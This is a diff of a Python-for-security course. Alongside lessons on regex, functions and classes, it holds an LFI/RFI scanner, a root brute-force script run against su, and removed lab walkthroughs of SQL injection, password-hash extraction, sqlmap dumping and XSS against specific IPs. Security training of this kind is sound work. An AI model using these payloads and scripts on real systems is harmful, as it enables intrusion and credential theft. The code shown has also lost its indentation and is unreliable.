2486		result= re.split(r'[;,\s]', line)
2487		print result
2488		----------------------------------------------------------------------
2489
2490		Output:
2491		['asdf', 'fjdk', 'afed', 'fjek', 'asdf', 'foo']
2492
2493
2494
2495		We can also use method re.sub() to replace these multiple delimiters with one as space " ".
2496
2497
2498		Code
2499		---------------------------Type This-----------------------------------
2500
2501		import re
2502		line = 'asdf fjdk;afed,fjek,asdf,foo'
2503		result= re.sub(r'[;,\s]',' ', line)
2504		print result
2505		----------------------------------------------------------------------
2506
2507		Output:
2508		asdf fjdk afed fjek asdf foo
2509
2510
2511
2512
2513		**************************************************
2514		* Problem 8: Retrieve Information from HTML file *
2515		**************************************************
2516
2517
2518
2519		I want to extract information from a HTML file (see below sample data). Here we need to extract information available between <td> and </td> except the first numerical index. I have assumed here that below html code is stored in a string str.
2520
2521
2522
2523		Sample HTML file (str)
2524		---------------------------Paste This-----------------------------------
2525
2526		<tr align="center"><td>1</td> <td>Noah</td> <td>Emma</td></tr>
2527		<tr align="center"><td>2</td> <td>Liam</td> <td>Olivia</td></tr>
2528		<tr align="center"><td>3</td> <td>Mason</td> <td>Sophia</td></tr>
2529		<tr align="center"><td>4</td> <td>Jacob</td> <td>Isabella</td></tr>
2530		<tr align="center"><td>5</td> <td>William</td> <td>Ava</td></tr>
2531		<tr align="center"><td>6</td> <td>Ethan</td> <td>Mia</td></tr>
2532		<tr align="center"><td>7</td> <td HTML>Michael</td> <td>Emily</td></tr>
2533		----------------------------------------------------------------------
2534
2535		Solution:
2536
2537
2538
2539		Code
2540		---------------------------Type This-----------------------------------
2541
2542		result=re.findall(r'<td>\w+</td>\s<td>(\w+)</td>\s<td>(\w+)</td>',str)
2543		print result
2544		----------------------------------------------------------------------
2545
2546		Output:
2547		[('Noah', 'Emma'), ('Liam', 'Olivia'), ('Mason', 'Sophia'), ('Jacob', 'Isabella'), ('William', 'Ava'), ('Ethan', 'Mia'), ('Michael', 'Emily')]
2548
2549
2550
2551		You can read html file using library urllib2 (see below code).
2552
2553
2554		Code
2555		---------------------------Type This-----------------------------------
2556
2557		import urllib2
2558		response = urllib2.urlopen('')
2559		html = response.read()
2560		----------------------------------------------------------------------
2561
2562
2563
2564
2565
2566
2567		#################################################
2568		# Lesson 27: Python Functions & String Handling #
2569		#################################################
2570
2571		Python can make use of functions:
2572		http://www.tutorialspoint.com/python/python_functions.htm
2573
2574
2575
2576		Python can interact with the 'crypt' function used to create Unix passwords:
2577		http://docs.python.org/2/library/crypt.html
2578
2579
2580
2581		Tonight we will see a lot of the split() method so be sure to keep the following references close by:
2582		http://www.tutorialspoint.com/python/string_split.htm
2583
2584
2585		Tonight we will see a lot of slicing so be sure to keep the following references close by:
2586		http://techearth.net/python/index.php5?title=Python:Basics:Slices
2587
2588
2589		---------------------------Type This-----------------------------------
2590		vi LFI-RFI.py
2591
2592
2593		---------------------------Paste This-----------------------------------
2594
2595
2596		#!/usr/bin/env python
2597		print "\n### PHP LFI/RFI Detector ###"
2598
2599		import urllib2,re,sys
2600
2601		TARGET = "http://10.1.1.38/showfile.php?filename=about.txt"
2602		RFIVULN = "https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt?"
2603		TravLimit = 12
2604
2605		print "==> Testing for LFI vulns.."
2606		TARGET = TARGET.split("=")[0]+"=" ## URL MANUPLIATION
2607		for x in xrange(1,TravLimit): ## ITERATE THROUGH THE LOOP
2608		TARGET += "../"
2609		try:
2610		source = urllib2.urlopen((TARGET+"etc/passwd")).read() ## WEB REQUEST
2611		except urllib2.URLError, e:
2612		print "$$$ We had an Error:",e
2613		sys.exit(0)
2614		if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE
2615		print "!! ==> LFI Found:",TARGET+"etc/passwd"
2616		break ## BREAK LOOP WHEN VULN FOUND
2617
2618		print "\n==> Testing for RFI vulns.."
2619		TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANUPLIATION
2620		try:
2621		source = urllib2.urlopen(TARGET).read() ## WEB REQUEST
2622		except urllib2.URLError, e:
2623		print "$$$ We had an Error:",e
2624		sys.exit(0)
2625		if re.search("Hello world",source): ## SEARCH FOR TEXT IN SOURCE
2626		print "!! => RFI Found:",TARGET
2627
2628		print "\nScan Complete\n" ## DONE
2629
2630
2631
2632		-----------------------------------------------------------------------
2633
2634
2635		################################
2636		# Lesson 28: Password Cracking #
2637		################################
2638
2639		---------------------------Type This-----------------------------------
2640
2641		wget https://s3.amazonaws.com/infosecaddictsfiles/htcrack.py
2642
2643		vi htcrack.py
2644
2645		vi list.txt
2646
2647		---------------------------Paste This-----------------------------------
2648
2649		hello
2650		goodbye
2651		red
2652		blue
2653		yourname
2654		tim
2655		bob
2656
2657		-----------------------------------------------------------------------
2658
2659		---------------------------Type This-----------------------------------
2660
2661		htpasswd -nd yourname
2662		- enter yourname as the password
2663
2664
2665
2666		python htcrack.py joe:7XsJIbCFzqg/o list.txt
2667
2668
2669
2670
2671		sudo apt-get install -y python-mechanize python-pexpect python-pexpect-doc
2672
2673		rm -rf mechanize-0.2.5.tar.gz
2674
2675		sudo /bin/bash
2676
2677		passwd
2678		*set root password*
2679
2680
2681
2682		---------------------------Type This-----------------------------------
2683
2684		vi rootbrute.py
2685
2686		---------------------------Paste This-----------------------------------
2687
2688		#!/usr/bin/env python
2689
2690		import sys
2691		try:
2692		import pexpect
2693		except(ImportError):
2694		print "\nYou need the pexpect module."
2695		print "http://www.noah.org/wiki/Pexpect\n"
2696		sys.exit(1)
2697
2698		#Change this if needed.
2699		# LOGIN_ERROR = 'su: incorrect password'
2700		LOGIN_ERROR = "su: Authentication failure"
2701
2702		def brute(word):
2703		print "Trying:",word
2704		child = pexpect.spawn('/bin/su')
2705		child.expect('Password: ')
2706		child.sendline(word)
2707		i = child.expect (['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3)
2708		if i == 1:
2709		print "Incorrect Password"
2710
2711		if i == 2:
2712		print "\n\t[!] Root Password:" ,word
2713		child.sendline ('id')
2714		print child.before
2715		child.interact()
2716
2717		if len(sys.argv) != 2:
2718		print "\nUsage : ./rootbrute.py <wordlist>"
2719		print "Eg: ./rootbrute.py words.txt\n"
2720		sys.exit(1)
2721
2722		try:
2723		words = open(sys.argv[1], "r").readlines()
2724		except(IOError):
2725		print "\nError: Check your wordlist path\n"
2726		sys.exit(1)
2727
2728		print "\n[+] Loaded:",len(words),"words"
2729		print "[+] BruteForcing...\n"
2730		for word in words:
2731		brute(word.replace("\n",""))
2732	-	Create a file that contains the following data:
2732	+
2733
2734		-----------------------------------------------------------------------
2735
2736
2737		References you might find helpful:
2738		http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python
2739
2740
2741
2742
2743
2744
2745
2746		---------------------------Type This-----------------------------------
2747
2748
2749		wget https://s3.amazonaws.com/infosecaddictsfiles/md5crack.py
2750
2751	-	f=open('file.txt', "r")
2751	+
2752
2753	-	str = f.read()
2753	+
2754		-----------------------------------------------------------------------
2755
2756
2757
2758
2759		Why use hexdigest
2760		http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string
2761
2762
2763
2764
2765		http://md5online.net/
2766
2767
2768
2769
2770
2771		---------------------------Type This-----------------------------------
2772
2773	-	NOTE: You can put any website URL that you want in the urllib2.urlopen('')
2773	+
2774		wget https://s3.amazonaws.com/infosecaddictsfiles/wpbruteforcer.py
2775
2776
2777		-----------------------------------------------------------------------
2778
2779	-	# Day 2 Homework videos to watch #
2779	+
2780
2781	-	Here is your first set of youtube videos that I'd like for you to watch:
2781	+
2782	-	https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 11-20)
2782	+	# Lesson 29: Functions #
2783		########################
2784
2785
2786		***********************
2787		* What are Functions? *
2788		***********************
2789
2790
2791	-	###############################################################
2791	+
2792	-	----------- ############### # Day 3: Web App Pentesting, PW Cracking and more with Python # ############### -----------
2792	+
2793	-	###############################################################
2793	+
2794
2795		Python makes use of blocks.
2796	-	# Basic: Web Application Testing #
2796	+
2797		A block is a area of code of written in the format of:
2798
2799	-	Most people are going to tell you reference the OWASP Testing guide.
2799	+
2800	-	https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
2800	+
2801		1st block line
2802	-	I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
2802	+
2803		2nd block line
2804
2805	-	The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
2805	+
2806	-
2806	+
2807	-	1. Does the website talk to a DB?
2807	+
2808	-	- Look for parameter passing (ex: site.com/page.php?id=4)
2808	+
2809	-	- If yes - try SQL Injection
2809	+
2810		Functions in python are defined using the block keyword "def", followed with the function's name as the block's name. For example:
2811	-	2. Can I or someone else see what I type?
2811	+
2812	-	- If yes - try XSS
2812	+
2813		print("Hello From My Function!")
2814	-	3. Does the page reference a file?
2814	+
2815	-	- If yes - try LFI/RFI
2815	+
2816		Functions may also receive arguments (variables passed from the caller to the function). For example:
2817	-	Let's start with some manual testing against 45.63.104.73
2817	+
2818		def my_function_with_args(username, greeting):
2819		print("Hello, %s , From My Function!, I wish you %s"%(username, greeting))
2820	-	#######################
2820	+
2821	-	# Attacking PHP/MySQL #
2821	+
2822	-	#######################
2822	+
2823
2824	-	Go to LAMP Target homepage
2824	+
2825	-	http://45.63.104.73/
2825	+
2826
2827
2828		****************************************
2829	-	Clicking on the Acer Link:
2829	+
2830	-	http://45.63.104.73/acre2.php?lap=acer
2830	+
2831
2832	-	- Found parameter passing (answer yes to question 1)
2832	+
2833	-	- Insert ' to test for SQLI
2833	+
2834		# Define our 3 functions
2835		---------------------------Paste This-----------------------------------
2836
2837	-	http://45.63.104.73/acre2.php?lap=acer'
2837	+
2838		print("Hello From My Function!")
2839
2840		def my_function_with_args(username, greeting):
2841	-	Page returns the following error:
2841	+
2842	-	You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1
2842	+
2843		def sum_two_numbers(a, b):
2844		return a + b
2845
2846	-	In order to perform union-based sql injection - we must first determine the number of columns in this query.
2846	+
2847	-	We do this using the ORDER BY
2847	+
2848
2849		#prints - "Hello, Joe, From My Function!, I wish you a great year!"
2850		my_function_with_args("Joe", "a great year!")
2851	-	http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
2851	+
2852		# after this line x will hold the value 3!
2853		x = sum_two_numbers(1,2)
2854	-	Page returns the following error:
2854	+
2855	-	Unknown column '100' in 'order clause'
2855	+
2856
2857		************
2858		* Exercise *
2859		************
2860	-	http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
2860	+
2861		In this exercise you'll use an existing function, and while adding your own to create a fully functional program.
2862
2863	-	Page returns the following error:
2863	+
2864	-	Unknown column '50' in 'order clause'
2864	+
2865		Add a function named build_sentence(info) which receives a single argument containing a string and returns a sentence starting with the given string and ending with the string " is a benefit of functions!"
2866
2867		Run and see all the functions work together!
2868
2869	-	http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
2869	+
2870		---------------------------Paste This-----------------------------------
2871
2872	-	Page returns the following error:
2872	+
2873	-	Unknown column '25' in 'order clause'
2873	+
2874		pass
2875
2876		# Modify this function to concatenate to each benefit - " is a benefit of functions!"
2877		def build_sentence(benefit):
2878	-	http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
2878	+
2879
2880		def name_the_benefits_of_functions():
2881	-	Page returns the following error:
2881	+
2882	-	Unknown column '12' in 'order clause'
2882	+
2883		print(build_sentence(benefit))
2884
2885		name_the_benefits_of_functions()
2886
2887	-	http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
2887	+
2888		-----------------------------------------------------------------------
2889
2890	-	---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
2890	+
2891
2892
2893		#####################################
2894	-	Now we build out the union all select statement with the correct number of columns
2894	+	# Lesson 30: Python Lambda Function #
2895		#####################################
2896
2897	-	http://www.techonthenet.com/sql/union.php
2897	+
2898		Python allows you to create anonymous function i.e function having no names using a facility called lambda function.
2899
2900		lambda functions are small functions usually not more than a line. It can have any number of arguments just like a normal function. The body of lambda functions is very small and consists of only one expression. The result of the expression is the value when the lambda is applied to an argument. Also there is no need for any return statement in lambda function.
2901
2902	-	http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
2902	+
2903
2904		Consider a function multiply()
2905
2906		def multiply(x, y):
2907	-	Now we negate the parameter value 'acer' by turning into the word 'null':
2907	+
2908
2909
2910	-	http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
2910	+
2911
2912		To create a lambda function first write keyword lambda followed by one of more arguments separated by comma, followed by colon sign ( : ), followed by a single line expression.
2913	-	We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
2913	+
2914		---------------------------Type This-----------------------------------
2915
2916	-	Use a cheat sheet for syntax:
2916	+
2917	-	http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
2917	+
2918		36
2919		-----------------------------------------------------------------------
2920
2921	-	http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
2921	+
2922
2923	-	http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
2923	+
2924
2925	-	http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
2925	+
2926
2927	-	http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
2927	+
2928		12
2929		-----------------------------------------------------------------------
2930	-	http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
2930	+
2931		Note that lambda function can’t contain more than one expression.
2932
2933
2934
2935		#############################
2936	-	# Question I get a lot #
2936	+	# Lesson 31: Python Classes #
2937		#############################
2938	-	Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
2938	+
2939
2940	-	Here is a good reference for it:
2940	+
2941	-	https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
2941	+
2942		****************
2943	-	Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
2943	+
2944		Classes are the cornerstone of Object Oriented Programming. They are the blueprints used to create objects. And, as the name suggests, all of Object Oriented Programming centers around the use of objects to build programs.
2945
2946		You don't write objects, not really. They are created, or instantiated, in a program using a class as their basis. So, you design objects by writing classes. That means that the most important part of understanding Object Oriented Programming is understanding what classes are and how they work.
2947
2948	-	#########################
2948	+
2949	-	# File Handling Attacks #
2949	+
2950	-	#########################
2950	+
2951		***********************
2952	-	Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
2952	+
2953
2954		This next part if going to get abstract. You can think of objects in programming just like objects in the real world. Classes are then the way you would describe those objects and the plans for what they can do.
2955
2956	-	http://45.63.104.73/showfile.php?filename=about.txt
2956	+
2957
2958		What about what they can do? Nearly every web vuln scanner can do the same basic things, but they just might do them differently or at different speeds. You could then describe the actions that a vuln scanner can perform using functions. In Object Oriented Programming, though, functions are called methods.
2959
2960		So, if you were looking to use "vuln scanner" objects in your program, you would create a "vuln scanner" class to serve as a blueprint with all of the variables that you would want to hold information about your "vuln scanner" objects and all of the methods to describe what you would like your vuln scanner to be able to do.
2961	-	See if you can read files on the file system:
2961	+
2962
2963		******************
2964	-	http://45.63.104.73/showfile.php?filename=/etc/passwd
2964	+
2965		******************
2966
2967	-	We call this attack a Local File Include or LFI.
2967	+
2968		Now that you have a general idea of what a class is, it's best to take a look at a real Python class and study how it is structured.
2969	-	Now let's find some text out on the internet somewhere:
2969	+
2970	-	https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt
2970	+
2971
2972		class WebVulnScanner(object):
2973	-	Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
2973	+
2974		model = '10.5'
2975		year = '2014'
2976		version ='Consultant Edition'
2977	-	http://45.63.104.73/showfile.php?filename=https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt
2977	+
2978		profile = 'High Risk'
2979
2980	-	#########################################################################################
2980	+
2981	-	# SQL Injection #
2981	+
2982	-	# http://45.63.104.73/1-Intro_To_SQL_Intection.pptx #
2982	+
2983	-	#########################################################################################
2983	+
2984
2985		def scanning(self, speed):
2986	-	- Another quick way to test for SQLI is to remove the paramter value
2986	+
2987		-----------------------------------------------------------------------
2988
2989
2990	-	# Error-Based SQL Injection #
2990	+
2991
2992		From there, you can see a bunch of familiar things that you'd see floating around any Python program, variables and functions. There are a series of variables with information about the scanner and a couple of methods(functions) describing what the scanner can do. You can see that each of the methods takes two parameters, self and speed. You can see that "speed" is used in the methods to print out how fast the scanner is scanning, but "self" is different.
2993
2994	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
2994	+
2995	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
2995	+
2996	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
2996	+
2997	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
2997	+
2998	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
2998	+
2999	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
2999	+
3000	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
3000	+
3001	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
3001	+
3002	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
3002	+
3003		print("Your %s is crawling at %s" % (self.model, speed))
3004		-----------------------------------------------------------------------
3005
3006		It's awkward and odd, but it works, and it's really not worth worrying about. Just remember to include "self" as the first parameter of your methods and "self." in front of your variables, and you'll be alright.
3007
3008
3009	-	# Union-Based SQL Injection #
3009	+
3010		* Using A Class *
3011		*****************
3012
3013
3014	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 100--
3014	+
3015	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 50--
3015	+
3016	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 25--
3016	+
3017	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 10--
3017	+
3018	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 5--
3018	+
3019	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 6--
3019	+
3020	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 7--
3020	+
3021	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 8--
3021	+
3022	-	http://45.77.162.239/bookdetail.aspx?id=2 order by 9--
3022	+
3023	-	http://45.77.162.239/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
3023	+
3024		---------------------------Type This-----------------------------------
3025
3026	-	We are using a union select statement because we are joining the developer's query with one of our own.
3026	+
3027	-	Reference:
3027	+
3028	-	http://www.techonthenet.com/sql/union.php
3028	+
3029	-	The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
3029	+
3030	-	It removes duplicate rows between the various SELECT statements.
3030	+
3031
3032	-	Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
3032	+
3033		-----------------------------------------------------------------------
3034
3035		What if you want to change the profile of your scanning? You can definitely do that too, and it works just like changing the value of any other variable. Try printing out the profile of your scanner first. Then, change the profile, and print it out again.
3036	-	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
3036	+
3037
3038		print("The profile of my scanner settings is %s" % myscanner.profile)
3039	-	Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
3039	+
3040		print("The profile of my scanner settings is %s" % myscanner.profile)
3041		-----------------------------------------------------------------------
3042
3043	-	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
3043	+
3044	-	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
3044	+
3045	-	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
3045	+
3046	-	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
3046	+
3047		print("The scanning profile of my new scanner is %s" % mynewscanner.profile)
3048		-----------------------------------------------------------------------
3049
3050		That one's high risk. New objects are copied from the class, and the class still says that the profile is high risk. Objects exist in the computer's memory while a program is running. When you change the values within an object, they are specific to that object as it exists in memory. The changes won't persist once the program stops and won't change the class that it was created from.
3051
3052
3053	-	- Another way is to see if you can get the backend to perform an arithmetic function
3053	+
3054		# The self variable in python explained #
3055		#########################################
3056
3057	-	http://45.77.162.239/bookdetail.aspx?id=(2)
3057	+
3058	-	http://45.77.162.239/bookdetail.aspx?id=(4-2)
3058	+
3059	-	http://45.77.162.239/bookdetail.aspx?id=(4-1)
3059	+
3060
3061		So here is our class:
3062		---------------------------Paste This-----------------------------------
3063	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1=1--
3063	+
3064	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1=2--
3064	+
3065	-	http://45.77.162.239/bookdetail.aspx?id=1*1
3065	+
3066	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1 >-1#
3066	+
3067	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1<99#
3067	+
3068	-	http://45.77.162.239/bookdetail.aspx?id=2 or 1<>1#
3068	+
3069	-	http://45.77.162.239/bookdetail.aspx?id=2 or 2 != 3--
3069	+
3070	-	http://45.77.162.239/bookdetail.aspx?id=2 &0#
3070	+
3071
3072		First let me explain the above code without the technicalities. First of all we make a class port. Then we assign it a property “open” which is currently false. After that we assign it a function open_port which can only occur if “open” is False which means that the port is open.
3073
3074	-	http://45.77.162.239/bookdetail.aspx?id=2 and 1=1--
3074	+
3075	-	http://45.77.162.239/bookdetail.aspx?id=2 and 1=2--
3075	+
3076	-	http://45.77.162.239/bookdetail.aspx?id=2 and user='joe' and 1=1--
3076	+
3077	-	http://45.77.162.239/bookdetail.aspx?id=2 and user='dbo' and 1=1--
3077	+
3078
3079		x = port()
3080		-----------------------------------------------------------------------
3081
3082		Now x is a port which has a property open and a function open_port. Now we can access the property open by typing:
3083	-	# Blind SQL Injection Testing #
3083	+
3084
3085	-	Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
3085	+
3086		-----------------------------------------------------------------------
3087	-	3 - Total Characters
3087	+
3088		The above command is same as:
3089		---------------------------Type This-----------------------------------
3090	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
3090	+
3091	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
3091	+
3092	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
3092	+
3093
3094		Now you can see that self refers to the bound variable or object. In the first case it was x because we had assigned the port class to x whereas in the second case it referred to port(). Now if we have another port y, self will know to access the open value of y and not x. For example check this example:
3095	-	Let's go for a quick check to see if it's DBO
3095	+
3096
3097		>>> x = port()
3098		>>> x.open
3099	-	http://45.77.162.239/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
3099	+
3100		>>> y = port()
3101		>>> y.open = True
3102	-	Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
3102	+
3103		True
3104		>>> x.open
3105		False
3106	-	D - 1st Character
3106	+
3107	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
3107	+
3108	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
3108	+
3109	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
3109	+
3110	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
3110	+
3111
3112	-	B - 2nd Character
3112	+
3113	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
3113	+
3114	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
3114	+
3115		if not this.open:
3116	-	O - 3rd Character
3116	+
3117	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
3117	+
3118	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
3118	+
3119	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
3119	+
3120	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
3120	+
3121	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
3121	+
3122	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
3122	+
3123	-	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
3123	+
3124		###############################
3125		# Lesson 32: Malware Analysis #
3126		###############################
3127
3128
3129
3130	-	##########
3130	+
3131	-	# Sqlmap #
3131	+
3132	-	##########
3132	+
3133	-	If you want to see how we automate all of the SQL Injection attacks you can log into your StrategicSec-Ubuntu-VM and run the following commands:
3133	+
3134		You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
3135	-	---------------------------Type This-----------------------------------
3135	+
3136
3137	-	cd /home/strategicsec/toolz/sqlmap-dev/
3137	+
3138	-	python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -b
3138	+
3139	-	python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-user
3139	+
3140	-	python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --current-db
3140	+
3141	-	python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --dbs
3141	+
3142	-	python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp --tables
3142	+
3143	-	python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns
3143	+
3144	-	python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns
3144	+
3145	-	python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns --dump
3145	+
3146	-	python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns --dump
3146	+
3147	-	python sqlmap.py -u "http://45.77.162.239/bookdetail.aspx?id=2" --users --passwords
3147	+
3148
3149		unzip oledump_V0_0_22.zip
3150
3151	-	###############################################################################
3151	+	wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
3152	-	# What is XSS #
3152	+
3153	-	# http://45.63.104.73/2-Intro_To_XSS.pptx #
3153	+
3154	-	###############################################################################
3154	+
3155
3156	-	OK - what is Cross Site Scripting (XSS)
3156	+
3157
3158	-	1. Use Firefox to browse to the following location:
3158	+
3159		-----------------------------------------------------------------------
3160
3161	-	http://45.63.104.73/xss_practice/
3161	+
3162		- Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
3163
3164	-	A really simple search page that is vulnerable should come up.
3164	+
3165
3166		python oledump.py 064016.doc -s A5 -v
3167		-----------------------------------------------------------------------
3168
3169	-	2. In the search box type:
3169	+
3170
3171		---------------------------Type This-----------------------------------
3172	-	<script>alert('So this is XSS')</script>
3172	+
3173		python oledump.py 064016.doc -s A3 -v
3174		-----------------------------------------------------------------------
3175
3176	-	This should pop-up an alert window with your message in it proving XSS is in fact possible.
3176	+
3177	-	Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
3177	+
